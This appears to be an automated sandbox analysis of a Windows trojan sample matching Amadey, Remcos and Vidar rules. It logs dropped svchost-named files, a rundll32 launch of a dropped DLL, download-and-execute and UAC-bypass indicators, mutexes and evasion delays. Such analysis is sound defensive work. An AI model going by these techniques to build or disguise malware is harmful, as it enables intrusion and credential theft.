                                Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                                Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00416702 ExitWindowsEx,LoadLibraryA,GetProcAddress,2_2_00416702
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 004255FF appears 41 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00402093 appears 50 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00CC16C0 appears 268 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00CC829B appears 46 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00CC1350 appears 93 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 004346BE appears 41 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00425668 appears 43 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00CC285B appears 64 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00401E65 appears 34 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00434D70 appears 54 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00CB2B70 appears 76 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 0042C510 appears 44 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 0040104E appears 123 times
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: String function: 00CC2ED0 appears 70 times
                                Source: yaALNupJCH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
                                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@8/17@144/8
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041A998 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041A998
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041B3F6 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_0041B3F6
                                Source: yaALNupJCH.exeReversingLabs: Detection: 76%
                                Source: yaALNupJCH.exeVirustotal: Detection: 73%
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exe
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exeJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exeJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004178A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_004178A0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile created: C:\Users\user\AppData\Local\Temp\1000026011\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0041A15D __ehhandler$?_Init@?$numpunct@G@std@@IAEXABV_Locinfo@2@_N@Z,__EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,3_2_0041A15D
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040F3C2 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,2_2_0040F3C2
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7592
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeMutant created: \Sessions\1\BaseNamedObjects\dh-A9HL6N
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeMutant created: \Sessions\1\BaseNamedObjects\9a9b42ef037916ec84b9b7b3ac05b288
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: yaALNupJCH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: yaALNupJCH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: yaALNupJCH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: yaALNupJCH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: yaALNupJCH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: yaALNupJCH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: yaALNupJCH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: yaALNupJCH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: yaALNupJCH.exe
                                Source: yaALNupJCH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: yaALNupJCH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: yaALNupJCH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: yaALNupJCH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: yaALNupJCH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CEA251 push eax; iretd 0_2_00CEA43D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CEA251 push eax; iretd 0_2_00CEA851
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CEA43E push eax; iretd 0_2_00CEA43D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CEA661 push eax; iretd 0_2_00CEA851
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CEAE1E push eax; iretd 0_2_00CEAE25
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC2F16 push ecx; ret 0_2_00CC2F29
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00457046 push ecx; ret 2_2_00457059
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0045B11A push esp; ret 2_2_0045B141
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0045E54D push esi; ret 2_2_0045E556
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00457968 push eax; ret 2_2_00457986
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00434DB6 push ecx; ret 2_2_00434DC9
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CEA251 push eax; iretd 2_2_00CEA43D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CEA251 push eax; iretd 2_2_00CEA851
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CB5467 push ebx; retn 0000h2_2_00CB546A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CEA43E push eax; iretd 2_2_00CEA43D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CEA661 push eax; iretd 2_2_00CEA851
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CEAE1E push eax; iretd 2_2_00CEAE25
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC2F16 push ecx; ret 2_2_00CC2F29
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0042C555 push ecx; ret 3_2_0042C568
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004256D7 push ecx; ret 3_2_004256EA
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041CA9E LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CA9E
                                Source: yaALNupJCH.exeStatic PE information: section name: uvhg

                                Persistence and Installation Behavior

                                barindex
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1025890323.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile created: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dllJump to dropped file
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exeJump to dropped file
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dllJump to dropped file
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exeJump to dropped file
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00406EB0 ShellExecuteW,URLDownloadToFileW,2_2_00406EB0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041A998 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041A998

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 1333
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1333 -> 49810
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 1333
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1333 -> 49810
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 1333
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1333 -> 49810
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041CA9E LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CA9E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040F6F5 Sleep,ExitProcess,2_2_0040F6F5
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432Thread sleep count: 3362 > 30Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432Thread sleep time: -100860000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7452Thread sleep time: -1260000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7448Thread sleep time: -1080000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432Thread sleep count: 5848 > 30Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432Thread sleep time: -175440000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552Thread sleep count: 1403 > 30Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552Thread sleep time: -4209000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552Thread sleep count: 8588 > 30Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552Thread sleep time: -25764000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeLast function: Thread delayed
